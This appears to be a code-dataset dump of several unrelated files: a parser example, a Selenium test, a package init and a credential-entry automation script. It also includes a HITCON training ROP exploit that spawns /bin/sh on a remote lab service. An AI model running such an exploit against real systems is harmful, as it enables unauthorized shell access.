| 24 | 62 | 0.72549 | 55 | 408 | 5.254545 | 0.527273 | 0.083045 | 0.110727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.191176 | 408 | 16 | 63 | 25.5 | 0.875758 | 0 | 0 | 0 | 0 | 0 | 0.05102 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.416667 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
807ff9a0013174ce9485ba56d32cbc72ac6a8cdb | 601 | py | Python | examples/arith.py | pcanz/pPEGpy | f4dc1bb3bfc56feaba5add5b815adf4a2768b909 | [
"MIT"
] | null | null | null | examples/arith.py | pcanz/pPEGpy | f4dc1bb3bfc56feaba5add5b815adf4a2768b909 | [
"MIT"
] | null | null | null | examples/arith.py | pcanz/pPEGpy | f4dc1bb3bfc56feaba5add5b815adf4a2768b909 | [
"MIT"
] | null | null | null | import pPEG
print("Arith operatpr expression example....")
arith = pPEG.compile("""
exp = add
add = sub ('+' sub)*
sub = mul ('-' mul)*
mul = div ('*' div)*
div = pow ('/' pow)*
pow = val ('^' val)*
grp = '(' exp ')'
val = " " (sym / num / grp) " "
sym = [a-zA-Z]+
num = [0-9]+
""")
tests = [
" 1 + 2 * 3 ",
"x^2^3 - 1"
];
for test in tests:
p = arith.parse(test)
print(p)
# 1+2*3 ==> (+ 1 (* 2 3))
# ["add",[["num","1"],["mul",[["num","2"],["num","3"]]]]]
# x^2^3+1 ==> (+ (^ x 2 3) 1)
# ["add",[["pow",[["sym","x"],["num","2"],["num","3"]]],["num","1"]]]
| 18.212121 | 69 | 0.404326 | 90 | 601 | 2.7 | 0.366667 | 0.049383 | 0.049383 | 0.049383 | 0.041152 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057269 | 0.244592 | 601 | 32 | 70 | 18.78125 | 0.477974 | 0.291181 | 0 | 0 | 0 | 0 | 0.648456 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.047619 | 0 | 0.047619 | 0.095238 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
808745cd6599b35823fa3a5f9fd93d09258ade85 | 1,519 | py | Python | Selenium_learning/04_ElementSendSmsTest.py | yeyuning1/AutoTT | 1ce88e9e73d71fa11d4d8ad12bd6741aa71f97d2 | [
"MIT"
] | null | null | null | Selenium_learning/04_ElementSendSmsTest.py | yeyuning1/AutoTT | 1ce88e9e73d71fa11d4d8ad12bd6741aa71f97d2 | [
"MIT"
] | 1 | 2021-06-02T00:24:41.000Z | 2021-06-02T00:24:41.000Z | Selenium_learning/04_ElementSendSmsTest.py | yeyuning1/AutoTT | 1ce88e9e73d71fa11d4d8ad12bd6741aa71f97d2 | [
"MIT"
] | null | null | null | from selenium import webdriver
from time import sleep
import unittest
class SendMsgCase(unittest.TestCase):
def setUp(self):
self.dr = webdriver.Chrome()
self.dr.get('https://h5.ele.me/login/#redirect=https%3A%2F%2Fwww.ele.me%2Fhome%2F')
self.dr.implicitly_wait(10)
# 封装CSS定位方法
def by_css(self, css):
return self.dr.find_element_by_css_selector(css)
# 手机号码输入框定位
def mobile_phone_input_box(self):
return self.by_css('[type = "tel"]')
# 【免费获取验证码】按钮定位
def send_msg_button(self):
return self.by_css('.CountButton-3e-kd')
# 获取 发送验证码成功 文本信息
def send_msg_successful_text(self):
return self.by_css('#registerContainer > div > div.codeSendHint').text
# 发送验证码
def send_msg(self, mobile_phone):
self.mobile_phone_input_box().send_keys(mobile_phone)
self.send_msg_button().click()
# 测试用例
def test_send_msg_button(self):
# 发送验证码
self.send_msg('178****5756')
sleep(2)
# 验证【免费获取验证码】按钮 被禁用
self.assertFalse(self.send_msg_button().is_enabled())
# 期望结果
expected_result = '已发送'
# 预期结果
actual_result = self.send_msg_button().text
# 验证 实际结果包含预期结果 “已经发送”
self.assertTrue(expected_result in actual_result)
def test_login_with_smscode(self):
# 连接到redis服务器取出smscode,点击登陆 获取状态返回码是否正确
pass
def tearDown(self):
self.dr.quit()
if __name__ == '__main__':
unittest.main()
| 24.5 | 91 | 0.63792 | 194 | 1,519 | 4.737113 | 0.484536 | 0.060936 | 0.070729 | 0.052231 | 0.062024 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014925 | 0.250165 | 1,519 | 61 | 92 | 24.901639 | 0.791923 | 0.107966 | 0 | 0 | 0 | 0.03125 | 0.123134 | 0 | 0 | 0 | 0 | 0 | 0.0625 | 1 | 0.28125 | false | 0.03125 | 0.09375 | 0.125 | 0.53125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
8098f59fb4f00fc445f8a807e5cbe4d479fa92bf | 863 | py | Python | HITCON-Training/LAB/lab5/simplerop.py | kernweak/HITCON-Training-writeup | cb9c7ca3dbb8bc22ad41bd94bf5b9f929823aa7c | [
"MIT"
] | 30 | 2017-09-05T14:29:30.000Z | 2022-03-20T01:51:29.000Z | HITCON-Training/LAB/lab5/simplerop.py | kernweak/HITCON-Training-writeup | cb9c7ca3dbb8bc22ad41bd94bf5b9f929823aa7c | [
"MIT"
] | null | null | null | HITCON-Training/LAB/lab5/simplerop.py | kernweak/HITCON-Training-writeup | cb9c7ca3dbb8bc22ad41bd94bf5b9f929823aa7c | [
"MIT"
] | 7 | 2018-03-15T10:07:43.000Z | 2020-12-14T09:36:19.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwnpwnpwn import *
from pwn import *
host = "10.211.55.28"
port = 8888
r = remote(host,port)
gadget = 0x809a15d # mov dword ptr [edx], eax ; ret
pop_eax_ret = 0x80bae06
pop_edx_ret = 0x806e82a
pop_edx_ecx_ebx = 0x0806e850
pop_eax_ret = 0x080bae06
buf = 0x80ea060
int_80 = 0x80493e1
#write to memory
payload = "a"*32
payload += p32(pop_edx_ret)
payload += p32(buf)
payload += p32(pop_eax_ret)
payload += "/bin"
payload += p32(gadget)
payload += p32(pop_edx_ret)
payload += p32(buf+4)
payload += p32(pop_eax_ret)
payload += "/sh\x00"
payload += p32(gadget)
#write to register
payload += p32(pop_edx_ecx_ebx)
payload += p32(0)
payload += p32(0)
payload += p32(buf)
payload += p32(pop_eax_ret)
payload += p32(0xb)
payload += p32(int_80)
print len(payload)
r.recvuntil(":")
r.sendline(payload)
r.interactive()
| 18.76087 | 51 | 0.70336 | 138 | 863 | 4.224638 | 0.42029 | 0.25729 | 0.133791 | 0.082333 | 0.303602 | 0.265866 | 0.221269 | 0.221269 | 0.133791 | 0 | 0 | 0.135501 | 0.144844 | 863 | 45 | 52 | 19.177778 | 0.654472 | 0.121669 | 0 | 0.323529 | 0 | 0 | 0.033201 | 0 | 0 | 0 | 0.090305 | 0 | 0 | 0 | null | null | 0 | 0.058824 | null | null | 0.029412 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
809fb67389f1a15a5e682873f0a520242ed9aef8 | 3,980 | py | Python | Credential-Adder-User-Input.py | Wason1/Cerner-Credential-Auto-Adder | fa42508661d352dbc6aea6858f6b8a54a7533184 | [
"MIT"
] | null | null | null | Credential-Adder-User-Input.py | Wason1/Cerner-Credential-Auto-Adder | fa42508661d352dbc6aea6858f6b8a54a7533184 | [
"MIT"
] | null | null | null | Credential-Adder-User-Input.py | Wason1/Cerner-Credential-Auto-Adder | fa42508661d352dbc6aea6858f6b8a54a7533184 | [
"MIT"
] | null | null | null | # This adds credentials to the pool for the credential box
# Asks user for year and users to add
start_day = 1
start_month = 1
#start_year = 1904
#users_to_add = 100
users_to_add = int(input('how many users do you want to add?'))
print('Be aware a user can not have a duplicate credential with the same start date')
start_year = int(input('what year shall the creds start at (choose a year before 2018)?'))
# IMPORT LIBRARIES
import pyautogui
import time
import pygetwindow as gw
from ahk import AHK
ahk = AHK()
pyautogui.FAILSAFE = True
# Activate HNA User Window
try:
myWindow = gw.getWindowsWithTitle('User Maint')[0]
myWindow.activate()
myWindow.maximize()
except:
print('could not maximise User Maintenance window')
time.sleep(1)
# Switch Search Field to Username
ahk.key_press('F10')
time.sleep(0.1)
ahk.key_press('down')
time.sleep(0.1)
ahk.key_press('down')
time.sleep(0.1)
ahk.key_press('down')
time.sleep(0.1)
ahk.key_press('down')
time.sleep(0.1)
ahk.key_press('right')
time.sleep(0.1)
ahk.key_press('down')
time.sleep(0.1)
ahk.key_press('enter')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
# Open Credential Box
user = 'credentialbox'
pyautogui.typewrite(user, interval=0.1)
ahk.key_press('Enter')
# Select Credential Button
time.sleep(1)
ahk.key_press('f10')
time.sleep(0.1)
ahk.key_press('down')
time.sleep(0.1)
ahk.key_press('down')
time.sleep(0.1)
ahk.key_press('right')
time.sleep(0.1)
ahk.key_press('c')
time.sleep(1)
count = int(0)
while count < users_to_add:
# Click on create new credential
if count == 0:
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('down')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
else:
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('down')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
#Choose Credential
to_type = 'a'
pyautogui.typewrite(to_type, interval=0.1)
time.sleep(0.1)
# Go to type of licence
ahk.key_press('tab')
time.sleep(0.4)
# Choose Licence
ahk.key_press('l')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
# Enter date
day = "{0:0=2d}".format(start_day) # convert two digit
month = "{0:0=2d}".format(start_month) # convert two digit
year = str(start_year) # year to string
pyautogui.typewrite(day, interval=0.1)
pyautogui.typewrite(month, interval=0.1)
pyautogui.typewrite(year, interval=0.1)
# Get date for next round
start_day +=1
if start_day > 25:
start_day = int(1)
start_month += 1
if start_month > 12:
start_day = 1
start_month = 1
start_year +=1
# Hit Apply
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('enter')
time.sleep(2)
# delete credential
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('space')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('enter')
# Apply deletion
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('tab')
time.sleep(0.1)
ahk.key_press('enter')
time.sleep(1)
count +=1 | 24.567901 | 90 | 0.63191 | 659 | 3,980 | 3.708649 | 0.183612 | 0.195172 | 0.216039 | 0.211538 | 0.554419 | 0.519231 | 0.511866 | 0.502046 | 0.478314 | 0.478314 | 0 | 0.047451 | 0.216332 | 3,980 | 162 | 91 | 24.567901 | 0.736133 | 0.115578 | 0 | 0.687943 | 0 | 0 | 0.120034 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.028369 | 0 | 0.028369 | 0.014184 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
80c24487375fb8fc999bda53d3ebbccc9fadf09d | 411 | py | Python | mrpod/__init__.py | chuckedfromspace/mrpod | ed831ddb6c1c634767149630effec0e766b54e4a | [
"BSD-3-Clause"
] | 4 | 2020-12-06T17:03:21.000Z | 2021-05-26T22:07:59.000Z | mrpod/__init__.py | chuckedfromspace/mrpod | ed831ddb6c1c634767149630effec0e766b54e4a | [
"BSD-3-Clause"
] | null | null | null | mrpod/__init__.py | chuckedfromspace/mrpod | ed831ddb6c1c634767149630effec0e766b54e4a | [
"BSD-3-Clause"
] | null | null | null | """
MRPOD
"""
from __future__ import division, print_function, absolute_import
from .wavelet_transform import scale_to_frq, time_shift, CompositeFilter, WaveletTransform
from .modal_decomposition import (pod_eigendecomp, pod_modes, mrpod_eigendecomp,
mrpod_detail_bundle)
from .utils import pkl_dump, pkl_load
from ._version import __version__
__all__ = [s for s in dir()]
| 27.4 | 90 | 0.749392 | 50 | 411 | 5.62 | 0.68 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.187348 | 411 | 14 | 91 | 29.357143 | 0.841317 | 0.012165 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.714286 | 0 | 0.714286 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.